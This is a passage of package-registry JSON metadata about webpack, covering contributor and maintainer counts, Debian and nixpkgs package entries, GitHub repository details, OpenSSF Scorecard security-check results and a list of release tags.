hors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/node-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/node-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/node-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/node-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/node-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/node-webpack/codemeta","maintainers":[],"registry":{"name":"debian-12","url":"https://packages.debian.org/bookworm","ecosystem":"debian","default":true,"packages_count":34734,"maintainers_count":0,"namespaces_count":4,"keywords_count":2638,"github":"debian","metadata":{"codename":"bookworm","funded_packages_count":1339},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:49.459Z","updated_at":"2026-09-02T05:06:04.025Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/namespaces"}},{"id":13285395,"name":"nodePackages.webpack","ecosystem":"nixpkgs","description":"Packs ECMAScript/CommonJs/AMD modules for the browser. Allows you to split your codebase into multiple bundles, which can be loaded on demand. Supports loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-02T05:46:02.833Z","latest_release_published_at":"2026-02-02T05:46:02.833Z","latest_release_number":"5.89.0","last_synced_at":"2026-08-26T02:27:22.378Z","created_at":"2026-02-02T05:45:58.574Z","updated_at":"2026-08-26T07:42:18.822Z","registry_url":"https://search.nixos.org/packages?channel=23.11\u0026query=nodePackages.webpack","install_command":"nix-env -iA nixpkgs.nodePackages.webpack","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.11/pkgs/development/node-packages/node-packages.nix#L99635","metadata":{"nix_attribute":"webpack-5.89.0","position":"pkgs/development/node-packages/node-packages.nix:99635","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"],"upstream_ecosystem":"npm","upstream_name":"webpack","upstream_purl":"pkg:npm/webpack"},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"